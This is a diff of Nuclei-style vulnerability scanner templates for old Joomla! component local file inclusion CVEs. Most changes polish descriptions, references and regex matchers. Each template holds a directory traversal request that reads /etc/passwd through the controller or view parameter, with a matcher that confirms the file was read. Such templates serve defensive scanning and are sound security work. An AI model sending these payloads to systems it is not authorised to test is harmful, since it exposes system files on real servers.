description: A directory traversal vulnerability in the Matamko (com_matamko) component 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12286
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1495
|
||||
- http://www.vupen.com/english/advisories/2010/0929
|
||||
- http://packetstormsecurity.org/1004-exploits/joomlamatamko-lfi.txt
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1495
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
||||
|
|
|
|||
|
|
@ -4,24 +4,26 @@ info:
|
|||
name: Joomla! Component redSHOP 1.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
|
||||
description: A directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12054
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1531
|
||||
- http://packetstormsecurity.org/1004-exploits/joomlaredshop-lfi.txt
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1531
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12118
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1532
|
||||
- http://packetstormsecurity.org/1004-exploits/joomlapowermail-lfi.txt
|
||||
- http://web.archive.org/web/20210127202836/https://www.securityfocus.com/bid/39348/
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1532
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/15
|
||||
|
|
|
|||
|
|
@ -4,24 +4,26 @@ info:
|
|||
name: Joomla! Component TweetLA 1.0.1 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the TweetLA (com_tweetla) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the TweetLA (com_tweetla) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12142
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1533
|
||||
- http://secunia.com/advisories/39258
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1533
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/15
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component Shoutbox Pro - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Shoutbox Pro (com_shoutbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the Shoutbox Pro (com_shoutbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12067
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1534
|
||||
- http://web.archive.org/web/20210121195246/https://www.securityfocus.com/bid/39213/
|
||||
- http://secunia.com/advisories/39352
|
||||
remediation: Upgrade to a supported version
|
||||
classification:
|
||||
cve-id: CVE-2010-1534
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/15
|
||||
|
|
|
|||
|
|
@ -4,24 +4,26 @@ info:
|
|||
name: Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the TRAVELbook (com_travelbook) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the TRAVELbook (com_travelbook) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12151
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1535
|
||||
- http://secunia.com/advisories/39254
|
||||
classification:
|
||||
cve-id: CVE-2010-1535
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/24
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component com_blog - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter.
|
||||
reference: |
|
||||
description: A directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11625
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1540
|
||||
- http://secunia.com/advisories/38777
|
||||
- http://web.archive.org/web/20210121194559/https://www.securityfocus.com/bid/38530/
|
||||
classification:
|
||||
cve-id: CVE-2010-1540
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/06
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component JA Comment - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
|
||||
description: A directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12236
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1601
|
||||
- http://secunia.com/advisories/39472
|
||||
- http://packetstormsecurity.org/1004-exploits/joomlajacomment-lfi.txt
|
||||
classification:
|
||||
cve-id: CVE-2010-1601
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/24
|
||||
|
|
|
|||
|
|
@ -4,24 +4,26 @@ info:
|
|||
name: Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12283
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1602
|
||||
- http://packetstormsecurity.org/1004-exploits/joomlazimbcomment-lfi.txt
|
||||
classification:
|
||||
cve-id: CVE-2010-1602
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/30
|
||||
|
|
|
|||
|
|
@ -4,24 +4,28 @@ info:
|
|||
name: Joomla! Component ZiMBCore 0.1 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the ZiMB Core (aka ZiMBCore or com_zimbcore) component 0.1 in the ZiMB Manager collection for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the ZiMB Core (aka ZiMBCore or com_zimbcore) component 0.1 in the ZiMB Manager collection for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12284
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1603
|
||||
- http://web.archive.org/web/20210518112730/https://www.securityfocus.com/bid/39546
|
||||
- http://www.vupen.com/english/advisories/2010/0931
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1603
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/02/15
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component WMI 1.5.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12316
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1607
|
||||
- http://web.archive.org/web/20210121195713/https://www.securityfocus.com/bid/39608/
|
||||
- http://secunia.com/advisories/39539
|
||||
classification:
|
||||
cve-id: CVE-2010-1607
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/07
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component Graphics 1.0.6 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. NOTE some of these details are obtained from third party information.
|
||||
description: A directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12430
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1653
|
||||
- http://packetstormsecurity.org/1004-exploits/joomlagraphics-lfi.txt
|
||||
- http://web.archive.org/web/20210121195909/https://www.securityfocus.com/bid/39743/
|
||||
classification:
|
||||
cve-id: CVE-2010-1653
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/23
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component SmartSite 1.0.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2010-1657
|
||||
- https://www.exploit-db.com/exploits/12428
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1657
|
||||
- http://www.vupen.com/english/advisories/2010/1006
|
||||
- http://web.archive.org/web/20210121195906/https://www.securityfocus.com/bid/39740/
|
||||
classification:
|
||||
cve-id: CVE-2010-1657
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/02/27
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component NoticeBoard 1.3 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12427
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1658
|
||||
- http://www.vupen.com/english/advisories/2010/1007
|
||||
- http://secunia.com/advisories/39600
|
||||
classification:
|
||||
cve-id: CVE-2010-1658
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/02/27
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Ultimate Portfolio (com_ultimateportfolio) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the Ultimate Portfolio (com_ultimateportfolio) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12426
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1659
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2010-1659
|
||||
- http://web.archive.org/web/20210121195906/https://www.securityfocus.com/bid/39739/
|
||||
- http://www.exploit-db.com/exploits/12426
|
||||
classification:
|
||||
cve-id: CVE-2010-1659
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/02/28
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component Arcade Games 1.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12168
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1714
|
||||
- http://packetstormsecurity.org/1004-exploits/joomlaarcadegames-lfi.txt
|
||||
- http://secunia.com/advisories/39413
|
||||
classification:
|
||||
cve-id: CVE-2010-1714
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/02/28
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component Online Exam 1.5.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. NOTE some of these details are obtained from third party information.
|
||||
description: A directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12174
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1715
|
||||
- http://packetstormsecurity.org/1004-exploits/joomlaonlineexam-lfi.txt
|
||||
- http://www.osvdb.org/63659
|
||||
classification:
|
||||
cve-id: CVE-2010-1715
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/10
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component iF surfALERT 1.2 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12291
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1717
|
||||
- http://secunia.com/advisories/39526
|
||||
- http://www.vupen.com/english/advisories/2010/0924
|
||||
classification:
|
||||
cve-id: CVE-2010-1717
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/01
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component Archery Scores 1.0.6 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12282
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1718
|
||||
- http://secunia.com/advisories/39521
|
||||
- http://web.archive.org/web/20210121195621/https://www.securityfocus.com/bid/39545/
|
||||
classification:
|
||||
cve-id: CVE-2010-1718
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/01
|
||||
|
|
|
|||
|
|
@ -4,24 +4,26 @@ info:
|
|||
name: Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the MT Fire Eagle (com_mtfireeagle) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the MT Fire Eagle (com_mtfireeagle) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12233
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1719
|
||||
- http://www.exploit-db.com/exploits/12233
|
||||
classification:
|
||||
cve-id: CVE-2010-1719
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/01
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component Online Market 2.x - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12177
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1722
|
||||
- http://secunia.com/advisories/39409
|
||||
- http://www.exploit-db.com/exploits/12177
|
||||
classification:
|
||||
cve-id: CVE-2010-1722
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/01
|
||||
|
|
|
|||
|
|
@ -4,24 +4,26 @@ info:
|
|||
name: Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the iNetLanka Contact Us Draw Root Map (com_drawroot) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the iNetLanka Contact Us Draw Root Map (com_drawroot) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12289
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1723
|
